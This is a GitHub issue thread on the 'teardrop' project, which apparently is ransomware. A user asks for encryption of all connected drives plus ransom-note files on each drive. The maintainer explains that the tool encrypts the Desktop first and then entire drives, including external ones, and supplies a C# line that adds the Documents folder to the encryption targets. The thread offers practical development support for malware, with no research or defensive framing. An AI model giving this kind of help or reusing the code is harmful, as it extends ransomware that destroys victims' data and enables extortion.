### ISSUE TITLE
Encrypting other connected hard drives

### ISSUE THREAD

**Issue by Abraham313** [hackthedev/teardrop#3]
Please, Add encrypting full HDD  other connected hard drives instead of only Desktop.Create message in *.html  or *.txt files for all Drives and in Desktop

Thanks for this nice project

**Comment by hackthedev** [comment]
Hello @Abraham313 

It is encrypting the entire HDD and even external hard drives (at least it was designed to do so). I tried to "prioritise" encrypting the Desktop fist, then the entire HDD because it can take a lot of time until the complete drive is encrypted.

You might tried it in a VM and only saw that the desktop was encrypted right? Afterwards it should start encrypting the hole drive. You might just not notice it because it works its path from the root directory to all sub directories. 

<br>

i.e.:
```
C:\
C:\Programs\
C:\Programs\AppName
...
...
C:\Users\User\Documents
...
```

<br>

So it would take some time to get there. As you can see [here](https://github.com/hackthedev/teardrop/blob/master/teardrop/teardrop/Form1.cs#L182) (Line 182), it tries to get all files from the Desktop first. If you want to encrypt Documents folder afterwards too, you can add this line as example (code untested). It is important that you add those files to the array `desktopFiles` **before** the `foreach` loop that is following [(this loop)](https://github.com/hackthedev/teardrop/blob/456f6d65c5d001c91b862de28e50f97308e287e5/teardrop/teardrop/Form1.cs#L183).
```csharp
desktopFiles += Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Documents), "*.*", SearchOption.AllDirectories);
```

<br>

If you need any help just connect me again or create a new issue 😄

**Comment by Abraham313** [comment]
I have  got it.Thanks for the nice explanation.
